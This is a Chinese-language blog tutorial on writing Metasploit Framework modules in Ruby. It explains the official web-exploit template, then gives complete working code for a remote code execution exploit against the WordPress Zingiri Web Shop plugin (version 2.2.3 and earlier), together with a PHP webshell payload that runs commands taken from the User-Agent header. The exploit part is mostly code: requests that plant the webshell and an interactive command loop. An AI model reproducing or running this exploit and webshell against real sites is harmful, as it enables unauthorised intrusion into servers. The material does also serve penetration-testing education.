Metasploit Framework的 module 模板结构

最新推荐文章于 2024-04-04 12:49:44 发布
最新推荐文章于 2024-04-04 12:49:44 发布
阅读量3.3k 收藏 1
点赞数
分类专栏: 工具 文章标签: web安全 ruby
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shawdow_bug/article/details/121568334
版权

Metasploit Framework简称msf,是一个渗透测试平台,集成大量可用于渗透测试的模块,并且提供了模块的统一编写规范,可自行按照规范编写模块,并允许在自己的模块包含平台中的其他模块,最后把模块集成到 msf 中即可使用。因此,msf 既是一款工具,也是一个平台。

exploit模板

msf 的模块主要用 Ruby 语言编写,为什么是主要呢?因为在新版本中也给出了 python 的模板。

以实现 exploit 模块为例子,官方给出的针对 web 服务的模板文件在 metasploit-framework/modules/exploits/example_webapp.rb。

简化一下模板:

#
# 编写一个web的exploit模块,首先要继承 Msf::Exploit::Remote;
# 如果编写 auxiliary 模块,就继承 Msf::Auxiliary。
#
class MetasploitModule < Msf::Exploit::Remote
  # Rank 表示这个模块的可靠性,根据目标范围、利用条件、利用难度设置的等级,NormalRanking表示
  # 这个模块针对的是目标系统的特定版本,并且不能有效地自动探测。
  Rank = NormalRanking

  #
  # 这个模块针对的是 web 服务,因此需要包含 HttpClient 模块与目标服务器交互,包含之后
  # 就给这个模块提供了几个参数的设置:RHOSTS、RPORT、SSL、VHOST。
  # 如果用过 msf 的话,应该知道它们分别是目标的主机名,端口,是否开启SSL,HTTP-Host头部。
  #
  include Msf::Exploit::Remote::HttpClient

  # 初始化方法,模块加载时首先执行
  def initialize(info = {})
    super(
      # 有关模块的描述信息
      update_info(
        info,
        'Name'           => 'Sample Webapp Exploit',
        'Description'    => %q(
            This exploit module illustrates how a vulnerability could be exploited
          in a webapp.
        ),
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'h00die <mike@stcyrsecurity.com>', # msf module
            'researcher' # original PoC, analysis
          ],
        'References'     =>
          [
            [ 'OSVDB', '12345' ],
            [ 'EDB', '12345' ],
            [ 'URL', 'http://www.example.com'],
            [ 'CVE', '1978-1234']
          ],
        'Platform'       => ['python'],
        'Privileged'     => false,0
        'Arch'           => ARCH_PYTHON,
        'Targets'        =>
          [
            [ 'Automatic Target', {}]
          ],
        'DisclosureDate' => '2013-04-01',
        
        'DefaultTarget'  => 0
      )
    )
    # 参数的注册,在这里可以为之前包含的模块设置默认参数,例如这里设置 HttpClient 的 RPORT,
    # 也可以再添加一些需要的参数,以提供给后续运行的方法使用。
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ false, 'Password to login with', '123456']),
        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/example/'])
      ], self.class
    )
  end

  #
  # check方法是在真正漏洞利用之前,检查目标系统是否满足漏洞利用的条件,例如主机是否在线、
  # 软件版本、服务版本等等。
  # 在 msf 执行 check 后,运行这个方法。
  #
  def check
    # 
    begin
      .......
    end
    Exploit::CheckCode::Safe
  end

  # exploit方法是编写漏洞利用代码的位置,这个方法用于完成整个漏洞利用的过程,例如给目标主机发送哪
  # 些数据,根据目标的响应结果再发送哪些数据,等等。经过一次或多个的交互,完成漏洞利用。
  # 在 msf 执行 exploit 或 run 后,运行这个方法。
  def exploit
    begin
      .......
    end

  end
end

根据exp实现一个exploit模块

exp来源:WordPress Plugin Zingiri 2.2.3

先实现一个 payload 模块,提供webshell的php代码:

require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
module MetasploitModule

  include Msf::Payload::Php
  include Msf::Payload::Single

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'PHP Simple Shell',
      'Description'   => 'Get a simple php shell',
      'Author'        => [ 'binghe911' ],
      'License'       => BSD_LICENSE,
      'Platform'      => 'php',
      'Arch'          => ARCH_PHP,
      'Privileged'    => false
      ))
  end

  # 返回 webshell 的php代码
  def php_shell
    shell = <<-END_OF_PHP_CODE
    <?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_USER_AGENT]));die; ?>
    END_OF_PHP_CODE
    return Rex::Text.compress(shell)
  end

  #
  # Constructs the payload
  #
  def generate
    return php_shell
  end
end

然后实现 exploit 模块,不详细介绍 exp 的原理,大概就是目标wordpress系统的 zingiri 插件存在创建任意代码的 php 脚本,导致可以写入 webshell:

# 包含 msf 的核心代码,使用它所提供的模块
require "msf/core"
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit',
        'Description'    => %q{
            This module exploits Remote Code Execution in the Wordpress,blogging software which install the Zingiri Web Shop plugin <=2.2.3 version
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'lukesun629@gmail.com', # msf module
            'lekusun629' # original PoC, analysis
          ],
        'References'     =>
          [
            
          ],
        'Platform'       => 'php',
        'Privileged'     => false,
        'Arch'           => ARCH_PHP,
        'Targets'        =>
          [
            [ 'Automatic', {}]
          ],
        'DisclosureDate' => 'NOV9 2010',
        'DefaultTarget'  => 0
      )
    )

    # 配置了要提供的参数 URI,有关 wordpress 的 path 路径。
    register_options(
      [
        OptString.new('URI', [true, "The full URI path to Wordpress", "/"]),
      ], self.class
    )
  end


  def exploit
    begin

      # 获取设置的参数
      url = datastore['URI']
      remotehsot = datastore['RHOST']

      # 以下进行 3 次请求-响应的交互,完成webshell的写入
      res = send_request_cgi({
        'uri'           => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php",
        'method'        => 'GET',
        }
      )

      directory = res.body.scan(/currentFolderPath" value="([^"]*)"/)
      code = "selectedDoc[]=#{payload.encoded}&currentFolderPath=#{directory.first.first}"
      res = send_request_cgi({
          'method' => 'POST',
          'uri' => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_file_cut.php",
          'data' => "#{code}",
      })
      cookie = res.headers['Set-Cookie'].split(";")
      dirname = Rex::Text.rand_text_alpha(8)
      res = send_request_cgi({
          'method' => 'POST',
          'uri' => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php",
          'data' => "new_folder=#{dirname}&currentFolderPath=#{directory.first.first}",
      })
      filename = Rex::Text.rand_text_alpha(8)
      res = send_request_cgi({
          'method' => 'POST',
          'uri' => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php",
          'cookie' => "#{cookie[0]}",
          'data' => "value=#{filename}&id=#{directory.first.first}#{dirname}",
      })

      # 循环读取攻击者输入的命令,并发送到目标webshell中执行
      while(1)
        print "#"
        cmd = gets
        if cmd.include?("exit")
          break
        end
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/inc/data.php",
          'agent' => "#{Rex::Text.encode_base64("#{cmd}")}\r\n",
        })
        data = res.body.split("_code_")[1]
        puts data.split("<!DOCTYPE")[0]
      end
    end
  end
end

测试

把上述编写好的模块文件放置在 msf 对应的目录中,

(1)exploit模块文件放在 metasploit-framework/modules/exploits/unix/webapp 目录中,并命名为 wordpress_zingiri_plugin.rb;

(2)payload模块文件放在 metasploit-framework/modules/payloads/singles/php 目录中,并命名为 php_shell.rb。

(3)启动 msfconsole,使用 wordpress_zingiri_plugin 模块,查看要配置的参数:

(4)配置参数,以及配置 payload:

 (5)运行模块:

相关资料链接:

Exploit Development – Metasploit modules for fun & profit – Team ROT Information Security

ruby - How to get started writing Metasploit modules/exploits? - Stack Overflow

https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking

friEnd`
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
framework-module的使用
03-22
framework-module的使用
Metasploit-模块介绍
weixin_44257023的博客
08-23 1684
Metasploit-模块介绍
MSF(Metasploit Framework)详细介绍及用法【新手篇】
最新发布
h1008685的博客
04-04 2690
MSF核心组件介绍,MSF常用模块介绍【exploit,payload,auxiliary,post-exploitation,encoder,nops,evasion】基础命令【启动msf,数据库管理,查找和使用模块,配置模块,执行模块 ,会话管理,辅助命令,系统命令】MSf初始配置【初始化数据库,创建/切换/删除工作区,扫描数据,查看扫描结果】
Metasploit framework(四)——Meterpreter模块简介
Jeromeyoung
03-26 1113
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 Meterpreter简介: 它是一种:高级、动态、可扩展的Payload、更加简单、快捷的获取目标...
Spring Framework Modules
05-25 198
1.Core Container 核心容器由spring-core,spring-beans,spring-context,spring-context-support, 和spring-expression(Spring Expression Language) 模块组成...
metasploit编写自己的module
Yale的博客
01-31 3408
制作我们自己的模块module 这次实验我们将会使用ruby编写我们自己的第一个模块。 没学过rubyruby语法很简单,不要紧的。我们这次只是做一个启蒙的作用,不会涉及高深的语法知识。主要的目的在于了解metasploit的体系结构module的框架,以及编写一个能够输出hello world的module并成功能够在metasploit中成功使用 在我们深入研究模块构建和开发之前,先来看一...
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
metasploitframework-latest.pkg
09-17
metasploitframework-latest.pkg
Metasploit简介以及msf模块简介
weixin_61862241的博客
05-05 722
Metasploit简介以及msf模块简介
Frameworks & Modules
chuanyituoku的专栏
10-27 732
UIKit Cocoa classes that are specialized for iOS, whose names begin with “UI,” are part of the UIKit framework. The UIKit framework is imported () in the precompiled header file Foundation
Metasploit-framework import CVE module
走在成功路上的博客
10-30 314
Metasploit-framework import CVE module1. Update MSF2. Copy module script to Metasploit-framework 1. Update MSF root@kali:~# apt update root@kali:~# apt install metasploit-framework 2. Copy module sc...
spring framework 模块简介
weixin_33911824的博客
04-13 256
2019独角兽企业重金招聘Python工程师标准>>> ...
msf MessageBox后渗透模块编写
Cosmopolitan的博客
03-08 685
message_box.rb ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &lt; Msf::Post includ...
MSF运用外部module提权
土拨鼠挖洞中的博客
06-23 1187
1 将下载的module复制到/usr/share/metasploit-framework/modules/exploits/linux/ ;  2 useexploit/linux/telnet/AF_PACKET  3 showoptions 4  exploit 查看当前所有会话msf exploit(linux/telnet/AF_PACKET) &gt; sessions -l  选择...
Metasploit module开发入门篇
weixin_34280237的博客
03-08 888
小饼仔 · 2016/04/06 10:270x00 概述Metasploit——渗透测试神器,相信大家应该都用过或听过,drops里也有很多白帽子写过相关的文章,介绍如何使用Metasploit。使用过Metasploit的同学应该知道,Metasploit Framework是高度模块化的,即框架是由多个module组成,我们除了可以使用已有的 module,还可以自行编写module来满足自...
metasploit(十)漏洞攻击exploit代码编写
u010680986的博客
10-03 902
exploit格式 1.攻击载荷信息块 2.需要提供可用目标的列表 3.尽量使用exploit()和check()函数,少使用run函数 例如以下: require 'msf/core' #引入core库的内容 class Metasploit3 <Msf::Exploit::Remote Rank = ExcellentRanking #设置ran等级 include Msf::Exploit::Remote::Tcp ...
metasploitframework-latest
07-13
Metasploit Framework 是一个开源的渗透测试工具,它提供了一系列的漏洞利用模块、Payload生成器和其他辅助工具,帮助安全专业人员评估系统和网络的安全性。 要获取最新版本的 Metasploit Framework,你可以按照以下步骤进行操作: 1. 首先,确保你的系统已经安装了 Ruby 和 Git。如果还没有安装,你可以根据你的操作系统下载并安装它们。 2. 打开终端或命令提示符,并切换到你希望存放 Metasploit Framework 的目录。 3. 使用以下命令克隆 Metasploit Framework 的 Git 仓库: ``` git clone https://github.com/rapid7/metasploit-framework.git ``` 4. 切换到克隆下来的 metasploit-framework 目录: ``` cd metasploit-framework ``` 5. 安装依赖项。在终端中运行以下命令: ``` bundle install ``` 6. 安装完成后,你可以通过以下命令启动 Metasploit Framework: ``` ./msfconsole ``` 这将启动 Metasploit Framework 的控制台界面,你可以使用各种模块和工具来进行渗透测试。 请注意,Metasploit Framework 是一个强大的工具,需要遵循法律和伦理规范使用。在使用之前,请确保你已经获得了相关的授权和权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值